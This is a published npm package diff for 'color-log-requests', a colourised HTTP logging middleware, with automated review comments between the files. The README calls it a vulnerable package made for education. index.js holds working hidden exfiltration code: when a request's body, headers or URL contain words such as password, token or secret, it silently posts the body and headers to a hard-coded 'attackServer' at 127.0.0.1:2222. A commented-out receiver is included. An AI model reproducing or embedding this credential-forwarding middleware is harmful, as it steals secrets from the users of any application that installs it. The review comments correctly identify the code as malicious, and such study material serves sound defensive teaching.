color-log-requests 1.0.0
- package/README.md +49 -0
- package/attackServer.js +21 -0
- package/index.js +73 -0
- package/package.json +20 -0
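--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,49 @@
+**Warning: This package log requests containing sensitive data (token, password ...) in an "external" (localhost) server in 2222 port.**
+
+This package is a vulnerable package and is created for educational purposes.
+
+
+## Usage
+this package is a HTTP request logger middleware for node.js
+
+
+```javascript
+const logger = require('color-log-requests');
+app.use(logger);
+```
+
+The result is in the format:
+
+```bash
+<resStatusCode> <resContentLength> <datetime> <reqMethod> <reqURL> <reqHttpVersion> <reqUserAgent> <reqIp>
+```
+
+The status codes are displayed in color:
+- green for success (< 300)
+- magenta for redirect (<400)
+- red for failure (<600)
+- blank otherwise
+
+
+## Requirements
+It is necessary to install and use the [body-parser](https://www.npmjs.com/package/body-parser) package before using this package:
+```bash
+npm install body-parser
+```
+
+The call in code may look like this:
+```javascript
+const bodyParser = require('body-parser');
+app.use(bodyParser.json());
+
+...
+const logger = require('color-log-requests');
+app.use(logger);
+```
+
+
+## Installation
+Download node at [nodejs.org](http://nodejs.org/) and install it, if you haven't already.
+```
+npm install color-log-requests
+```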
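--- a/package/attackServer.js
+++ b/package/attackServer.js
@@ -0,0 +1,21 @@
+// const http = require('http');
+
+// const host = "127.0.0.1";
+// const port = 2222;
+
+
+// const server = http.createServer((req, res) => {
+// const chunks = [];
+// req.on("data", (chunk) => {
+// chunks.push(chunk);
+// });
+// req.on("end", () => {
+// const data = Buffer.concat(chunks);
+// console.log("New sensitive request: ", JSON.parse(data.toString()));
+// res.end();
+// });
+// })
+
+// server.listen(port, host, () => {
+// console.log(`Server is running on http://${host}:${port}`);
+// });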
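Review bot: attackServer.js is shipped entirely as commented-out code with no explanation, so nothing in the package can run it and the README's reference to a receiver on port 2222 has no working counterpart in the published tarball. Commented-out code without a note is a style problem in any file, and here it also leaves a reader guessing whether the receiver is part of the exercise or an abandoned draft. Either delete the file and describe the receiver in the README, or keep it with a one-line header such as `// Reference receiver for the demo (intentionally not wired into package.json); kept as documentation of what the middleware in index.js posts to.`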
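--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,73 @@
+const axios = require("axios")
+
+const attackServer = "127.0.0.1"
+const aAttackPort = 2222
+
+
+const sensitiveValues = ["login", "register", "2fa", "password", "token", "key", "pass", "secret", ]
+
+
+const stringContainsSensitiveValue = (string) => {
+let response = false
+sensitiveValues.forEach(value => {
+if (string.toLowerCase().includes(value.toLowerCase())) {
+response = true
+}
+})
+return response
+}
+
+
+
+const dictContainsSensitiveValue = (dict) => {
+let response = false
+for (let key in dict) {
+if (stringContainsSensitiveValue(key)) {
+response = true
+}
+}
+return response
+}
+
+
+
+module.exports = function (req, res, next) {
+res.on("finish", function () {
+const date = new Date()
+
+if (res.statusCode < 300) { // Success
+console.log(`\x1b[32m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else if (res.statusCode < 400) { // Redirection
+console.log(`\x1b[35m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else if (res.statusCode < 600) { // Client or server Error
+console.log(`\x1b[31m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else { // Unknown
+console.log(`\x1b[37m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}` );
+}
+
+
+if (dictContainsSensitiveValue(req.body) || stringContainsSensitiveValue(decodeURI(req.url)) || dictContainsSensitiveValue(req.headers)) {
+axios.post(`http://${attackServer}:${aAttackPort}`, {
+url: decodeURI(req.url),
+host: req.headers.host,
+method: req.method,
+date: date.toLocaleString(),
+client: {
+ip: req.ip,
+body: req.body,
+headers: req.headers,
+httpVersion: req.httpVersion,
+},
+response: {
+statusCode: res.statusCode,
+body: res.body,
+headers: res.headers,
+contentLength: res.get('Content-Length') || 0
+}
+})
+}
+
+
+});
+next();
+}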
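Review bot: index.js carries no header comment stating what the module actually does, which for a package published as a teaching sample is the first thing a reader needs: the `finish` listener inside `module.exports` posts `req.body` and `req.headers` to the hard-coded `http://127.0.0.1:2222` whenever a body key, a header name or the decoded URL contains one of the words in `sensitiveValues`, and the colourised console line is the only part a user of the middleware sees. I would add a comment above line 34 of the new file describing exactly that trigger condition and destination, and name `attackServer`/`aAttackPort` as the values a learner is expected to look for when auditing the package. On style, `stringContainsSensitiveValue` and `dictContainsSensitiveValue` set a flag inside `forEach`/`for...in` where `sensitiveValues.some(...)` and `Object.keys(dict).some(...)` state the same check directly. The `axios.post(...)` promise is neither awaited nor caught, so when nothing listens on 2222 the host application reports an unhandled rejection; it is worth pointing out in the comment that this is the most visible runtime symptom of the demo.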
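--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,20 @@
+{
+"name": "color-log-requests",
+"version": "1.0.0",
+"description": "This package is a vulnerable package and is created for educational purposes.",
+"main": "index.js",
+"scripts": {
+"start": "node index.js"
+},
+"keywords": [
+"test",
+"vulnerable",
+"logging",
+"color"
+],
+"author": "Pierrick Delrieu",
+"license": "ISC",
+"dependencies": {
+"axios": "^1.3.3"
+}
+}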
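Review bot: The `description` field and the `vulnerable` keyword call this a vulnerable package, but index.js contains no weakness that a third party exploits; the package itself forwards request bodies and headers to a hard-coded address, which makes it a malicious (data-exfiltrating) sample rather than a vulnerable one, and for a teaching artefact the distinction matters because the two are found and mitigated by different controls. I would change line 4 to `"description": "Educational demo of a malicious npm package: forwards request bodies and headers matching a keyword list to 127.0.0.1:2222",` and replace the `vulnerable` keyword with `malicious`. The `start` script runs `node index.js`, but that file only assigns `module.exports` and exits, so `npm start` does nothing observable; either drop the script or point it at a small example app that mounts the middleware.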